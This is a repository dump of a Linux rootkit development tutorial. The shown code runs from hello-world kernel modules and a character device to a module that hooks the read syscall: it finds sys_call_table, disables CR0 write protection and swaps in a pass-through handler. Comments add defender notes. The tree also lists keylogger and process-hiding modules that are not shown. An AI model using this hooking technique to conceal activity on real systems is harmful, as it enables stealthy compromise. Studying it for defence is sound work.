├── .vscode └── settings.json ├── README.md ├── module01 ├── .vscode │ └── tasks.json ├── Makefile └── helloworld.c ├── module02 ├── .vscode │ └── tasks.json ├── Makefile └── helloworld.c ├── module03 ├── .vscode │ ├── ipch │ │ ├── 3a227f7b4ea1e547 │ │ │ ├── exit.ipch │ │ │ └── mmap_address.bin │ │ └── 97375d4bcec1856a │ │ │ ├── main.ipch │ │ │ └── mmap_address.bin │ └── tasks.json ├── Makefile ├── exit.c └── main.c ├── module04 ├── .vscode │ ├── ipch │ │ └── 81b6fce00c4f8bc1 │ │ │ └── mmap_address.bin │ └── tasks.json ├── Makefile ├── exit.c ├── foo ├── functs.h └── main.c ├── module05_hooking_sysread ├── .vscode │ └── tasks.json ├── Makefile ├── main.c └── main.o.ur-safe ├── module06_hooking_sysopen ├── .cache.mk ├── .vscode │ └── tasks.json ├── Makefile ├── main.c ├── main.o.ur-safe └── testfile ├── module07_hooking_getdents ├── .vscode │ └── tasks.json ├── Makefile ├── main.c ├── main.o.ur-safe ├── secretfile.txt └── testfile ├── module08_hooking_getdents_hidePIDs ├── .vscode │ └── tasks.json ├── Echo.c ├── Makefile ├── echo ├── main.c ├── main.o.ur-safe ├── secretfile.txt └── testfile ├── module09_hooking_syscall_connect ├── .vscode │ └── tasks.json ├── Echo.c ├── Makefile ├── echo ├── main.c ├── main.o.ur-safe ├── secretfile.txt └── testfile ├── module10_hooking_syscall_connect_redirect ├── .vscode │ └── tasks.json ├── Echo.c ├── Makefile ├── echo ├── main.c ├── main.o.ur-safe ├── secretfile.txt └── testfile ├── module11_Hooking_execve ├── .vscode │ └── tasks.json ├── Makefile ├── main.c └── main.o.ur-safe ├── module12_Hooking_execve_altercmd ├── .vscode │ └── tasks.json ├── Makefile ├── main.c └── main.o.ur-safe └── module13_Hooking_SyscallRead_Keylogger ├── .vscode └── tasks.json ├── Makefile ├── main.c └── main.o.ur-safe /.vscode/settings.json: -------------------------------------------------------------------------------- 1 | { 2 | "files.associations": { 3 | "unistd.h": "c", 4 | "module.h": "c", 5 | "stdio.h": "c", 6 | "stdlib.h": "c", 7 | "socket.h": 
"c", 8 | "in.h": "c", 9 | "audit.h": "c", 10 | "net.h": "c", 11 | "array": "c", 12 | "istream": "c", 13 | "ostream": "c", 14 | "tuple": "c", 15 | "type_traits": "c", 16 | "utility": "c" 17 | } 18 | } -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # rootkitdev-linux 2 | This is a small series on rootkit development for Linux O.S 3 | 4 | 5 | Our definitions of syscalls come from here: 6 | https://github.com/torvalds/linux/blob/39bed42de2e7d74686a2d5a45638d6a5d7e7d473/include/linux/syscalls.h 7 | -------------------------------------------------------------------------------- /module01/.vscode/tasks.json: -------------------------------------------------------------------------------- 1 | { 2 | // See https://go.microsoft.com/fwlink/?LinkId=733558 3 | // for the documentation about the tasks.json format 4 | "version": "2.0.0", 5 | "tasks": [ 6 | { 7 | "label": "echo", 8 | "type": "shell", 9 | "command": "make", 10 | "group": { 11 | "kind": "build", 12 | "isDefault": true 13 | } 14 | } 15 | ] 16 | } -------------------------------------------------------------------------------- /module01/Makefile: -------------------------------------------------------------------------------- 1 | obj-m += helloworld.o 2 | 3 | all: 4 | make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules 5 | 6 | clean: 7 | make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean 8 | 9 | -------------------------------------------------------------------------------- /module01/helloworld.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include // Debug messages 3 | #include //macros 4 | 5 | static int HelloInit(void){ 6 | 7 | printk(KERN_INFO "ROOTKITDEV_DEBUG: HELLO WORLD! 
\n"); 8 | return 0; 9 | } 10 | 11 | 12 | static void HelloExit(void){ 13 | 14 | printk(KERN_INFO "ROOTKITDEV_DEBUG : GOODBYE WORLD \n"); 15 | 16 | 17 | } 18 | 19 | 20 | module_init(HelloInit); 21 | module_exit(HelloExit); 22 | 23 | MODULE_LICENSE("GPL"); -------------------------------------------------------------------------------- /module02/.vscode/tasks.json: -------------------------------------------------------------------------------- 1 | { 2 | // See https://go.microsoft.com/fwlink/?LinkId=733558 3 | // for the documentation about the tasks.json format 4 | "version": "2.0.0", 5 | "tasks": [ 6 | { 7 | "label": "echo", 8 | "type": "shell", 9 | "command": "make", 10 | "group": { 11 | "kind": "build", 12 | "isDefault": true 13 | } 14 | } 15 | ] 16 | } -------------------------------------------------------------------------------- /module02/Makefile: -------------------------------------------------------------------------------- 1 | obj-m += helloworld.o 2 | 3 | all: 4 | make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules 5 | 6 | clean: 7 | make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean 8 | 9 | -------------------------------------------------------------------------------- /module02/helloworld.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include // Debug messages 3 | #include //macros 4 | #include 5 | #include 6 | 7 | 8 | MODULE_LICENSE("GPL"); 9 | 10 | 11 | #define DRIVER_AUTHOR "SourceCodeDeleted" 12 | #define DRIVER_DESC "Some hello world param driver" 13 | MODULE_AUTHOR(DRIVER_AUTHOR); 14 | MODULE_DESCRIPTION(DRIVER_DESC); 15 | 16 | 17 | MODULE_SUPPORTED_DEVICE("testdevice"); 18 | 19 | 20 | static char *MyString = ""; 21 | module_param(MyString, charp, 0000); 22 | MODULE_PARM_DESC(MyString, "This is a string that gets echoed."); 23 | 24 | 25 | static int HelloInit(void){ 26 | 27 | printk(KERN_INFO "ROOTKITDEV_DEBUG: %s \n", MyString); 28 | return 0; 29 | } 30 | 31 | 32 | 
static void HelloExit(void){ 33 | 34 | printk(KERN_INFO "ROOTKITDEV_DEBUG : GOODBYE WORLD \n"); 35 | 36 | 37 | } 38 | 39 | 40 | module_init(HelloInit); 41 | module_exit(HelloExit); 42 | 43 | -------------------------------------------------------------------------------- /module03/.vscode/ipch/3a227f7b4ea1e547/exit.ipch: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SourceCodeDeleted/rootkitdev-linux/b9c9f30533d71e955c14c050605069460c42a771/module03/.vscode/ipch/3a227f7b4ea1e547/exit.ipch -------------------------------------------------------------------------------- /module03/.vscode/ipch/3a227f7b4ea1e547/mmap_address.bin: -------------------------------------------------------------------------------- 1 | Xw -------------------------------------------------------------------------------- /module03/.vscode/ipch/97375d4bcec1856a/main.ipch: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SourceCodeDeleted/rootkitdev-linux/b9c9f30533d71e955c14c050605069460c42a771/module03/.vscode/ipch/97375d4bcec1856a/main.ipch -------------------------------------------------------------------------------- /module03/.vscode/ipch/97375d4bcec1856a/mmap_address.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SourceCodeDeleted/rootkitdev-linux/b9c9f30533d71e955c14c050605069460c42a771/module03/.vscode/ipch/97375d4bcec1856a/mmap_address.bin -------------------------------------------------------------------------------- /module03/.vscode/tasks.json: -------------------------------------------------------------------------------- 1 | { 2 | // See https://go.microsoft.com/fwlink/?LinkId=733558 3 | // for the documentation about the tasks.json format 4 | "version": "2.0.0", 5 | "tasks": [ 6 | { 7 | "label": "echo", 8 | "type": "shell", 9 | "command": "make", 10 | "group": { 11 | "kind": 
"build", 12 | "isDefault": true 13 | } 14 | } 15 | ] 16 | } -------------------------------------------------------------------------------- /module03/Makefile: -------------------------------------------------------------------------------- 1 | obj-m += kittyrootkit.o 2 | kittyrootkit-objs := main.o exit.o 3 | 4 | all: 5 | make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules 6 | 7 | clean: 8 | make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean 9 | 10 | -------------------------------------------------------------------------------- /module03/exit.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include // Debug messages 3 | #include //macros 4 | #include 5 | #include 6 | 7 | 8 | static void HelloExit(void){ 9 | 10 | printk(KERN_INFO "ROOTKITDEV_DEBUG : GOODBYE WORLD \n"); 11 | 12 | 13 | } 14 | 15 | 16 | module_exit(HelloExit); 17 | 18 | -------------------------------------------------------------------------------- /module03/main.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include // Debug messages 3 | #include //macros 4 | #include 5 | #include 6 | 7 | 8 | MODULE_LICENSE("GPL"); 9 | 10 | #define DRIVER_AUTHOR "SourceCodeDeleted" 11 | #define DRIVER_DESC "Some hello world param driver" 12 | MODULE_AUTHOR(DRIVER_AUTHOR); 13 | MODULE_DESCRIPTION(DRIVER_DESC); 14 | 15 | 16 | //MODULE_SUPPORTED_DEVICE("testdevice"); 17 | 18 | 19 | static char *MyString = ""; 20 | module_param(MyString, charp, 0000); 21 | MODULE_PARM_DESC(MyString, "This is a string that gets echoed."); 22 | 23 | 24 | static int HelloInit(void){ 25 | 26 | printk(KERN_INFO "ROOTKITDEV_DEBUG: %s \n", MyString); 27 | return 0; 28 | } 29 | 30 | 31 | 32 | 33 | module_init(HelloInit); 34 | 35 | -------------------------------------------------------------------------------- /module04/.vscode/ipch/81b6fce00c4f8bc1/mmap_address.bin: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/SourceCodeDeleted/rootkitdev-linux/b9c9f30533d71e955c14c050605069460c42a771/module04/.vscode/ipch/81b6fce00c4f8bc1/mmap_address.bin -------------------------------------------------------------------------------- /module04/.vscode/tasks.json: -------------------------------------------------------------------------------- 1 | { 2 | // See https://go.microsoft.com/fwlink/?LinkId=733558 3 | // for the documentation about the tasks.json format 4 | "version": "2.0.0", 5 | "tasks": [ 6 | { 7 | "label": "echo", 8 | "type": "shell", 9 | "command": "make", 10 | "group": { 11 | "kind": "build", 12 | "isDefault": true 13 | } 14 | } 15 | ] 16 | } -------------------------------------------------------------------------------- /module04/Makefile: -------------------------------------------------------------------------------- 1 | ccflags-y = -std=gnu99 2 | obj-m += kittyrootkit.o 3 | kittyrootkit-objs := main.o exit.o 4 | 5 | 6 | 7 | 8 | all: 9 | make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules 10 | 11 | clean: 12 | make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean 13 | 14 | -------------------------------------------------------------------------------- /module04/exit.c: -------------------------------------------------------------------------------- 1 | #include "functs.h" 2 | 3 | 4 | 5 | static void UnLoadDriver(void){ 6 | 7 | unregister_chrdev(Major, DEVICE_NAME); 8 | printk(KERN_INFO "ROOTKITDEV_DEBUG : Driver Unloaded! 
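\n"); 9 | 10 | } 11 | 12 | 13 | module_exit(UnLoadDriver); 14 | 15 |
--------------------------------------------------------------------------------
/module04/foo:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SourceCodeDeleted/rootkitdev-linux/b9c9f30533d71e955c14c050605069460c42a771/module04/foo
--------------------------------------------------------------------------------
/module04/functs.h:
--------------------------------------------------------------------------------
/* Shared declarations for the module04 character-device example. */

/* NOTE: the names of the eight headers below were lost when this page was extracted. */
#include
#include // Debug messages
#include //macros
#include
#include
#include
#include
#include

/* Entry points implemented in main.c and wired into its file_operations table. */
int init_module(void);
int device_open(struct inode * inode, struct file *file);
int device_release(struct inode * inode, struct file *file);
ssize_t device_read(struct file * file, char * buffer, size_t length, loff_t *offset);
ssize_t device_write(struct file * file , const char * buffer, size_t length, loff_t *offset);

#define SUCCESS 0
#define DEVICE_NAME "rootkit"
#define BUF_LEN 80 /* size of the message buffer, terminator included */
extern int Major;
--------------------------------------------------------------------------------
/module04/main.c:
--------------------------------------------------------------------------------
#include "functs.h"

MODULE_LICENSE("GPL");

#define DRIVER_AUTHOR "SourceCodeDeleted"
#define DRIVER_DESC "Some hello world param driver"
MODULE_AUTHOR(DRIVER_AUTHOR);
MODULE_DESCRIPTION(DRIVER_DESC);

/* Major number returned by register_chrdev(); exit.c passes it to unregister_chrdev(). */
int Major;
/* Non-zero while the device is open; device_open() refuses a second opener. */
static int Device_Open = 0;
/* Last message written to the device; always NUL-terminated. */
static char msg[BUF_LEN]={0};
/* Read cursor into msg; reset to the start of msg on every open. */
static char *msg_Ptr;

static struct file_operations fops = {
    .read = device_read,
    .write = device_write,
    .open = device_open,
    .release = device_release
};

/*
 * init_module - register the character device and log how to create its node.
 *
 * Passing 0 as the major number lets the kernel pick one; the chosen value is
 * kept in Major. Returns 0 on success or the negative value that
 * register_chrdev() returned.
 */
int init_module(void)
{
    Major = register_chrdev(0, DEVICE_NAME, &fops);
    if (Major < 0) {
        printk(KERN_ALERT "I have failed to load!\n");
        return Major;
    }

    printk(KERN_ALERT "I was assigned major number %d\n", Major);
    printk(KERN_ALERT "Please create device with name \n mknod /dev/%s c %d 0 \n", DEVICE_NAME, Major);
    return 0;
}

/*
 * device_open - allow a single opener and rewind the read cursor.
 *
 * Returns 0 on success, -EBUSY if the device is already open, or -ENODEV if
 * the module reference cannot be taken (the module is being unloaded).
 *
 * NOTE(review): the Device_Open test and increment are not atomic, so two
 * concurrent open() calls can both pass the check. Serialising them needs a
 * lock or an atomic flag, which this file does not currently set up.
 */
int device_open(struct inode * inode, struct file *file)
{
    if (Device_Open)
        return -EBUSY;

    /* Take the module reference before marking the device busy, so a failed
     * reference never leaves Device_Open stuck at 1. */
    if (!try_module_get(THIS_MODULE))
        return -ENODEV;

    Device_Open++;
    msg_Ptr = msg;
    return 0;
}

/*
 * device_release - mark the device free again and drop the module reference
 * taken in device_open(). Always returns 0.
 */
int device_release(struct inode * inode, struct file *file)
{
    Device_Open--;

    module_put(THIS_MODULE);
    return 0;
}

/*
 * device_read - copy the stored message to user space, starting at the cursor.
 *
 * buffer is a user-space pointer and is only written through put_user().
 * Returns the number of bytes copied, 0 once the cursor has reached the end
 * of the message, or -EFAULT if the user buffer cannot be written.
 */
ssize_t device_read(struct file * file, char * buffer, size_t length, loff_t *offset)
{
    ssize_t bytes_read = 0;

    if (*msg_Ptr == 0)
        return 0;

    while (length && *msg_Ptr) {
        /* put_user() fails on an unmapped or read-only destination; stop
         * there instead of ignoring the fault. The cursor is only advanced
         * after a successful store, and the increments are kept out of the
         * macro arguments. */
        if (put_user(*msg_Ptr, buffer))
            return -EFAULT;
        msg_Ptr++;
        buffer++;
        length--;
        bytes_read++;
    }
    return bytes_read;
}

/*
 * device_write - replace the stored message with data from user space.
 *
 * buffer is a user-space pointer of `length` bytes. At most BUF_LEN-1 bytes
 * are kept, so the message always stays NUL-terminated. Returns `length` on
 * success (input beyond BUF_LEN-1 bytes is discarded but reported as
 * consumed, as before) or -EFAULT if the user buffer cannot be read.
 *
 * The copy is bounded by the caller's length. Copying a fixed BUF_LEN-1 bytes
 * would read past the end of a shorter user buffer, and repeating the copy
 * once per input byte would keep the CPU in the kernel for as long as the
 * caller's length says.
 */
ssize_t device_write(struct file * file , const char * buffer, size_t length, loff_t *offset)
{
    size_t n = length;

    if (n > BUF_LEN - 1)
        n = BUF_LEN - 1;

    memset(msg, 0, BUF_LEN);

    /* copy_from_user() returns the number of bytes it could NOT copy. */
    if (copy_from_user(msg, buffer, n)) {
        /* Do not keep a partially copied message. */
        memset(msg, 0, BUF_LEN);
        return -EFAULT;
    }

    return length;
}

--------------------------------------------------------------------------------
/module05_hooking_sysread/.vscode/tasks.json:
--------------------------------------------------------------------------------
1 | { 2 | // See https://go.microsoft.com/fwlink/?LinkId=733558 3 | // for the documentation about the tasks.json format 4 | "version": "2.0.0", 5 | "tasks": [ 6 | { 7 | "label": "echo", 8 | "type": "shell", 9 | "command": "make", 10 |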
"group": { 11 | "kind": "build", 12 | "isDefault": true 13 | } 14 | } 15 | ] 16 | }
--------------------------------------------------------------------------------
/module05_hooking_sysread/Makefile:
--------------------------------------------------------------------------------
1 | ccflags-y = -std=gnu99 2 | obj-m += kittyrootkit.o 3 | kittyrootkit-objs := main.o 4 | 5 | 6 | 7 | 8 | all: 9 | make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules 10 | 11 | clean: 12 | make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean 13 | 14 |
--------------------------------------------------------------------------------
/module05_hooking_sysread/main.c:
--------------------------------------------------------------------------------
/*
 * Loadable kernel module that swaps the sys_call_table slot for __NR_read
 * with HookRead, a wrapper that forwards every call unchanged to the
 * original handler, and restores the slot when the module is unloaded.
 *
 * Defender notes:
 *  - While the hook is installed, the __NR_read slot points at HookRead,
 *    which lives in this module rather than in core kernel text. Integrity
 *    checks that compare syscall-table entries against the kernel text
 *    range flag exactly this state.
 *  - Loading the module requires privileged module loading; enforced module
 *    signing or kernel lockdown stops it before any of this code runs.
 *  - The code depends on kallsyms_lookup_name() being available to modules
 *    and on write_cr0() being able to clear the write-protect bit. Mainline
 *    kernels stopped exporting the former in 5.7 and have pinned that CR0
 *    bit since 5.3, so on current kernels the module does not work as
 *    written.
 */

/* NOTE: the names of the nine headers below were lost when this page was extracted. */
#include
#include
#include
#include
#include
#include
#include
#include
#include

MODULE_LICENSE("GPL");
MODULE_AUTHOR("SourceCodeDeleted");
MODULE_DESCRIPTION("Simple Hooking Of a Read Syscall");
MODULE_VERSION("1.0");

/* Address of the kernel's syscall table, resolved by name in SetHooks(). */
unsigned long **SYS_CALL_TABLE;

/*
 * Clear bit 0x10000 of CR0. On x86 this is the WP (write-protect) bit; with
 * it clear, kernel-mode writes to read-only pages are no longer refused.
 * NOTE(review): CR0 is a per-CPU register and nothing here disables
 * preemption, so the change is not guaranteed to apply to the CPU that
 * later performs the table write. Confirm against the target kernel.
 */
void EnablePageWriting(void){
    write_cr0(read_cr0() & (~0x10000));

}

/* Set bit 0x10000 of CR0 again, restoring write protection. */
void DisablePageWriting(void){
    write_cr0(read_cr0() | 0x10000);

}

/* Saved pointer to the handler that occupied the __NR_read slot before the hook. */
asmlinkage int (*original_read)(unsigned int, void __user*, size_t);

/*
 * Replacement handler for __NR_read. As written it only calls the saved
 * original handler with the same three arguments and returns its result.
 */
asmlinkage int HookRead(unsigned int fd, void __user* buf, size_t count) {
    //printk(KERN_INFO "READ HOOKED HERE! -- This is our function!");
    return (*original_read)(fd, buf, count);
}

/*
 * Module init: look up sys_call_table by name, log its address, then save
 * the current __NR_read entry and overwrite it with HookRead while write
 * protection is lifted. Always returns 0.
 *
 * NOTE(review): the lookup result is used without a NULL check. If the
 * symbol is not found, the table index below dereferences an invalid
 * pointer in kernel context.
 */
static int __init SetHooks(void) {
    // Gets Syscall Table **
    SYS_CALL_TABLE = (unsigned long**)kallsyms_lookup_name("sys_call_table");

    printk(KERN_INFO "Hooks Will Be Set.\n");
    /* Writes the table address to the kernel log. */
    printk(KERN_INFO "System call table at %p\n", SYS_CALL_TABLE);

    EnablePageWriting();

    // Replaces Pointer Of Syscall_read on our syscall.
    original_read = (void*)SYS_CALL_TABLE[__NR_read];
    SYS_CALL_TABLE[__NR_read] = (unsigned long*)HookRead;
    DisablePageWriting();

    return 0;
}

/*
 * Module exit: put the saved original handler back into the __NR_read slot
 * and log that the hook was removed.
 */
static void __exit HookCleanup(void) {

    // Clean up our Hooks
    EnablePageWriting();
    SYS_CALL_TABLE[__NR_read] = (unsigned long*)original_read;
    DisablePageWriting();

    printk(KERN_INFO "HooksCleaned Up!");
}

module_init(SetHooks);
module_exit(HookCleanup);
--------------------------------------------------------------------------------
/module05_hooking_sysread/main.o.ur-safe:
--------------------------------------------------------------------------------
1 | /home/krash/works/rootkitdev/module05_hooking_sysread/main.o-.text-38 2 | /home/krash/works/rootkitdev/module05_hooking_sysread/main.o-.text-48 3 | /home/krash/works/rootkitdev/module05_hooking_sysread/main.o-.text-69 4 | /home/krash/works/rootkitdev/module05_hooking_sysread/main.o-.text-79 5 |
--------------------------------------------------------------------------------
/module06_hooking_sysopen/.cache.mk:
--------------------------------------------------------------------------------
1 | __cached_gcc_-v_2>&1_|_grep_-q_"clang_version"_&&_echo_clang_||_echo_gcc := gcc 2 | __cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if____gcc_-Werror__-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Wno-format-security_-std_gnu89_-mretpoline-external-thunk_-c_-x_c_/dev/null_-o_"_TMP"__>/dev/null_2>&1;_then_echo_"-mretpoline-external-thunk";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := 3 |
__cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if____gcc_-Werror__-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Wno-format-security_-std_gnu89_-mindirect-branch_thunk-extern_-mindirect-branch-register_-c_-x_c_/dev/null_-o_"_TMP"__>/dev/null_2>&1;_then_echo_"-mindirect-branch_thunk-extern_-mindirect-branch-register";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := -mindirect-branch=thunk-extern -mindirect-branch-register 4 | __cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if____gcc_-Werror__-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Wno-format-security_-std_gnu89_-mretpoline_-c_-x_c_/dev/null_-o_"_TMP"__>/dev/null_2>&1;_then_echo_"-mretpoline";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := 5 | __cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if____gcc_-Werror__-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Wno-format-security_-std_gnu89_-mindirect-branch_thunk-inline_-mindirect-branch-register_-c_-x_c_/dev/null_-o_"_TMP"__>/dev/null_2>&1;_then_echo_"-mindirect-branch_thunk-inline_-mindirect-branch-register";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := -mindirect-branch=thunk-inline -mindirect-branch-register 6 | 
__cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if____gcc_-Werror__-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Wno-format-security_-std_gnu89_-fno-PIE_-c_-x_c_/dev/null_-o_"_TMP"__>/dev/null_2>&1;_then_echo_"-fno-PIE";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := -fno-PIE 7 | __cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if____gcc_-Werror__-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Wno-format-security_-std_gnu89_-fno-PIE_-fno-PIE_-c_-x_c_/dev/null_-o_"_TMP"__>/dev/null_2>&1;_then_echo_"-fno-PIE";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := -fno-PIE 8 | __cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if___gcc_-Werror_-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Wno-format-security_-std_gnu89_-fno-PIE_-Wmaybe-uninitialized_-c_-x_c_/dev/null_-o_"_TMP"__>/dev/null_2>&1;_then_echo_"-Wno-maybe-uninitialized";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := -Wno-maybe-uninitialized 9 | __cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if____gcc_-Werror__-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Wno-format-security_-std_gnu89_-fno-PIE__-mpreferred-stack-boundary_4_-c_-x_c_/dev/null_-o_"_TMP"__>/dev/null_2>&1;_then_echo_"_-mpreferred-stack-boundary_4";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := -mpreferred-stack-boundary=4 10 | 
__cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if____gcc_-Werror__-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Wno-format-security_-std_gnu89_-fno-PIE__-m16_-c_-x_c_/dev/null_-o_"_TMP"__>/dev/null_2>&1;_then_echo_"_-m16";_else_echo_"_-m32_-Wa_./arch/x86/boot/code16gcc.h";_fi;_rm_-f_"_TMP"_"_TMPO" := -m16 11 | __cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if____gcc_-Werror__-m16_-g_-Os_-D__KERNEL___-DDISABLE_BRANCH_PROFILING_-Wall_-Wstrict-prototypes_-march_i386_-mregparm_3_-fno-strict-aliasing_-fomit-frame-pointer_-fno-pic_-mno-mmx_-mno-sse__-ffreestanding_-c_-x_c_/dev/null_-o_"_TMP"__>/dev/null_2>&1;_then_echo_"_-ffreestanding";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := -ffreestanding 12 | __cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if____gcc_-Werror__-m16_-g_-Os_-D__KERNEL___-DDISABLE_BRANCH_PROFILING_-Wall_-Wstrict-prototypes_-march_i386_-mregparm_3_-fno-strict-aliasing_-fomit-frame-pointer_-fno-pic_-mno-mmx_-mno-sse_-ffreestanding__-fno-stack-protector_-c_-x_c_/dev/null_-o_"_TMP"__>/dev/null_2>&1;_then_echo_"_-fno-stack-protector";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := -fno-stack-protector 13 | __cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if____gcc_-Werror__-m16_-g_-Os_-D__KERNEL___-DDISABLE_BRANCH_PROFILING_-Wall_-Wstrict-prototypes_-march_i386_-mregparm_3_-fno-strict-aliasing_-fomit-frame-pointer_-fno-pic_-mno-mmx_-mno-sse_-ffreestanding_-fno-stack-protector__-Wno-address-of-packed-member_-c_-x_c_/dev/null_-o_"_TMP"__>/dev/null_2>&1;_then_echo_"_-Wno-address-of-packed-member";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := -Wno-address-of-packed-member 14 | 
__cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if____gcc_-Werror__-m16_-g_-Os_-D__KERNEL___-DDISABLE_BRANCH_PROFILING_-Wall_-Wstrict-prototypes_-march_i386_-mregparm_3_-fno-strict-aliasing_-fomit-frame-pointer_-fno-pic_-mno-mmx_-mno-sse_-ffreestanding_-fno-stack-protector_-Wno-address-of-packed-member__-mpreferred-stack-boundary_2_-c_-x_c_/dev/null_-o_"_TMP"__>/dev/null_2>&1;_then_echo_"_-mpreferred-stack-boundary_2";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := -mpreferred-stack-boundary=2 15 | __cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if____gcc_-Werror__-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-c_-x_c_/dev/null_-o_"_TMP"__>/dev/null_2>&1;_then_echo_"-mno-avx";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := -mno-avx 16 | __cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if____gcc_-Werror__-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-c_-x_c_/dev/null_-o_"_TMP"__>/dev/null_2>&1;_then_echo_"-falign-jumps_1";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := -falign-jumps=1 17 | 
